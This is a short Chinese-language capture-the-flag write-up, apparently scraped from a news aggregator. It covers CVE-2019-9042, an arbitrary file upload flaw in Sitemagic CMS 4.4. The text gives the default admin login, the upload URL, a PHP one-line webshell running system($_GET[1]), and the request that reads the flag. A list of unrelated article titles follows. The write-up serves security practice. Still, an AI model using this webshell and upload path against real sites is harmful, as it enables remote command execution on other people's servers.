当前位置: 首页 > news >正文

春秋云镜:CVE-2019-9042(Sitemagic CMS v4.4 任意文件上传漏洞)

一、题目

靶标介绍:

Sitemagic CMS v4.4 index.php?SMExt=SMFiles 存在任意文件上传漏洞,攻击者可上传恶意代码执行系统命令。

 进入题目:

admin/admin

 

/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages

 一句话木马:

system.php<?php system($_GET[1]);phpinfo();?>

 

 /files/images/system.php?1=cat ///flag

flag{35a77803-ae47-4b5e-a937-d71f263c8a79} 

 

http://www.lryc.cn/news/145074.html

相关文章:

  • 20230828工作日志:
  • flink on yarn 部署
  • postgresql基于postgis常用空间函数
  • 详细讲解移植u-boot.2022.10版本移植到开发板基本方法
  • Vue.js2+Cesium1.103.0 十一、Three.js 炸裂效果
  • Nodejs快速搭建简单的HTTP服务器,并发布公网远程访问
  • 爬虫入门01
  • 解读GIS软件:从ArcGIS到山海鲸可视化的全方位介绍
  • 嵌入式通用硬件模块设计——串口音频播放模块
  • 【PLSQL】PLSQL基础
  • 【C++笔记】C++内存管理
  • 十四五双碳双控时代下的“低碳认证”
  • Android——基本控件(下)(十九)
  • 聚类分析 | MATLAB实现基于DBSCAD密度聚类算法可视化
  • reactantd(12)动态表单的默认值问题
  • 无涯教程-Python机器学习 - Stochastic Gradient Boosting函数
  • SOLIDWORKS中多实体文件到装配体的转换技巧
  • Transformer (Attention Is All You Need) 论文精读笔记
  • Git企业开发控制理论和实操-从入门到深入(二)|Git的基本操作
  • Positive Technologies 专家帮助修复 Western Digital 网络存储设备中的一个危险漏洞
  • 【springboot】springboot定时任务:
  • 腾讯云学生服务器申请、学生认证入口及学生机价格表
  • pip安装mysqlclient依赖报错 /bin/sh: 1: mysql_config: not found如何解决
  • 基于paddleocr的版面分析
  • 网工内推 | IT网工,华为、华三认证优先,15k*13薪
  • leetcode 739. 每日温度
  • 【活体检测模型】活体检测思路推演
  • 【微服务部署】03-健康检查
  • SQL注入之报错注入
  • 基于大数据+django+mysql的银行信用卡用户的数仓系统